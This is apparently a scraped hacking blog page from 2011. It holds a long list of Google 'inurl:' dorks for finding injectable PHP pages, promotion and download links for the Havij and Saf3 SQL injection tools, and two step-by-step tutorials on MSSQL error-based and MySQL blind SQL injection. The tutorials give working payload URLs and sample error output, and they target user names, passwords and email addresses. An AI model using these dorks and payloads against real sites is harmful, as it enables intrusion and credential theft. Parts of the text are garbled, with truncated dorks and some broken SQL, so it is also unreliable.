inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
Reactions:
Advance Sqli Tool
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Features:
1. Supported Databases with injection methods:
1. MsSQL 2000/2005 with error
2. MsSQL 2000/2005 no error (union based)
3. MySQL (union based)
4. MySQL Blind
5. MySQL error based
6. Oracle (union based)
7. MsAccess (union based)
2.Automatic database detection
3.Automatic type detection (string or integer)
4.Automatic keyword detection (finding difference between the positive and negative response)
5.Trying different injection syntaxes
6.Proxy support
7.Real time result
8.Options for replacing space by /**/,+,... against IDS or filters
9.Avoid using strings (magic_quotes similar filters bypass)
10.Bypassing illegal union
11.Full customizable http headers (like referer and user agent)
12.Load cookie from site for authentication
13.Guessing tables and columns in mysql<5 (also in blind) and MsAccess
14.Fast getting tables and columns for mysql
15.Multi thread Admin page finder
16.Multi thread Online MD5 cracker
17.Getting DBMS Informations
18.Getting tables, columns and data
19.Command executation (mssql only)
20.Reading system files (mysql only)
21.insert/update/delete data
download
Reactions:
Saf3 Sql Injector v8.6 Released
Saf3 Sql Injector v8.6 Released
download Saf3 Sql Injector v8.6
at Saturday, October 01, 2011 No comments:
Email ThisBlogThis!Share to TwitterShare to Facebook Links to this post
Labels: Hacking, SQL, Tools
Reactions:
Thursday, 29 September 2011
MSSQL - injection, method of attack! Complete Tutorial By M4ST3R M!ND
MSSQL - injection, method of attack!
###########################
1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?
[1.1 Introduction]
############
This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.
There are several types of attacks in this way:
* - Normal MSSQL SQL Injection attacks
* - MSSQL injection in Web services (SOAP injection)
* - Union with MSSQL injection attack
* - ODBC error attack the "Convert"
* - MSSQL Blind SQL Injection attacks, etc. ..
For this will be used for writing this type of attack:
"Attack of the ODBC error message" Convert "
[1.2 How to ask Vulnerability page? ]
############################
How to ask who Vulnerability page is easy. This can use Google services company giant.
Let's open: Google
I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
ETC ....( I decided some examples, you can now use the logic, for better dorks)
[1.3 How to prove that the site of weakness? ]
##################################
So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:
++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.
Should now act as an example here, and where to put high ( ').
For example:
--------------------------------------
http://www.localhost.com/ / news.asp? id = 100 '
--------------------------------------
Now we can say that the error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
This page has weaknesses!
[1.4 How to find version 2.4 / DB name? ]
############################
Let the example easier to understand:
Version:
-------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
-------------------------------------------------- ------------------
And we have presented an example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright © 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Now go find DB_Name:
-------------------------------------------------- -------------------
http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
-------------------------------------------------- -------------------
eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
[1.5 How to discover the names table (table_name)]
######################################
Because it is discovered, or simply to find the side of the table goes through this method.
For example:
-------------------------------------------------- -------------------------------------------------- --------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------
And now there will be a mistake, such as:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value of users' data on the type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
That is, in this case the table (table_name) The first is the 'Users', now find the following table:
For example:
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
And now an error message will appear the same and will give another table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not news when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Another table in this case is 'news'
Now to find the table (table_name) third goes like this:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
I appear to us the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value categories' of data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Then the third table 'categories', and so on until you find all the tables.
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
[1.6 How to discover the names of column (column_name)]
###########################################
-If you want to column_name for users as' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'Name' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So colums name for the table (table_name) 'Users' the 'name'
Now find the column (column_name) other at the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not a password when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
columnes name (column_name) the other is 'password', now go find a rotating column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'emailaddress' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!
[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###
To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.
In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!
Some have now replaced the example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not an administrator when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
user name : Administrator
Replacing now the first column "Name" in the second column "password":
For example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value '123456 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
password: administratorpassword123
Now, instead of rotating columns works the same as above:
For example:
-------------------------------------------------- ---------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
-------------------------------------------------- ---------------------------------------------
emailaddress: king.cyborg@yahoo.com
Here then we have achieved some info on, and the name / pass and emailaddress page.
user name: Administrator
password: administratorpassword123
emailaddress: [email]king.cyborg@yahoo.com/email]
[ 1.8 Conclusion ]
############
================================================== ===========================
http://www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================
at Thursday, September 29, 2011 No comments:
Email ThisBlogThis!Share to TwitterShare to Facebook Links to this post
Labels: Hacking, SQL
Reactions:
[Tut] Blind SQL Injection (Private) M4STER M!ND
Tut] Blind SQL Injection (Private)
Let's start with advanced stuff.
I will be using our example
Code:
http://www.site.com/news.php?id=5 when we execute this, we see some page and articles on that page, pictures etc...
then when we want to test it for blind sql injection attack
Code:
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test
Code:
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
Code:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
Code:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 2) Test if subselect works
when select don't work then we use subselect
i.e
Code:
http://www.site.com/news.php?id=5 and (select 1)=1 if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
Code:
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend
i.e.
Code:
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let's say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
Code:
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 we get TRUE, keep incrementing
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 TRUE again, higher
[ Code]
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
[/Code]
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
then let's check the second character.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 TRUE, the page loads normally, higher.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 FALSE, lower number.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 TRUE, higher.
Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 FALSE!!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,
cause that makes you better SQL INJECTOR
